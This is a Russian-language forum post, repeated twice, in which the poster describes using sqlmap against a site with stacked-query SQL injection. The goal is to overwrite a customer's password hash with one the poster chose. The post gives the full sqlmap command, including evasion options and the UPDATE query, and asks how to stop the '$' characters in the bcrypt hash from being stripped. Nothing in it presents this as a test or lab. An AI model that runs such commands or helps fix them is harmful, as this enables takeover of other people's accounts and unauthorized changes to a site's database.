есть сайт с Stacked queries запрос к нему через sqlmap для замены пароля, хеш там BCrypt
выполняю команду
-p category --level=5 --risk=3 --tamper=space2comment --random-agent --current-db --sql-query="UPDATE bur.oi.oi_customer SET passwd='$2a$12$.iuYL/UwPo6IwhcbvLQJCOo7s.8f/R64wK6kvJ/MDPLRaBMXmNdda' WHERE email='mail@mail.com';"
команду все окей выполняет , но как я понял sqlmap обрезает $ как это можно исправить командой ? unhex и загрузку с файла пробовал
На выходе получается что пароль он устанавливает такой $.iuYL/UwPo6IwhcbvLQJCOo7s.8f/R64wK6kvJ/MDPLRaBMXmNdda
выполняю команду
-p category --level=5 --risk=3 --tamper=space2comment --random-agent --current-db --sql-query="UPDATE bur.oi.oi_customer SET passwd='$2a$12$.iuYL/UwPo6IwhcbvLQJCOo7s.8f/R64wK6kvJ/MDPLRaBMXmNdda' WHERE email='mail@mail.com';"
команду все окей выполняет , но как я понял sqlmap обрезает $ как это можно исправить командой ? unhex и загрузку с файла пробовал
На выходе получается что пароль он устанавливает такой $.iuYL/UwPo6IwhcbvLQJCOo7s.8f/R64wK6kvJ/MDPLRaBMXmNdda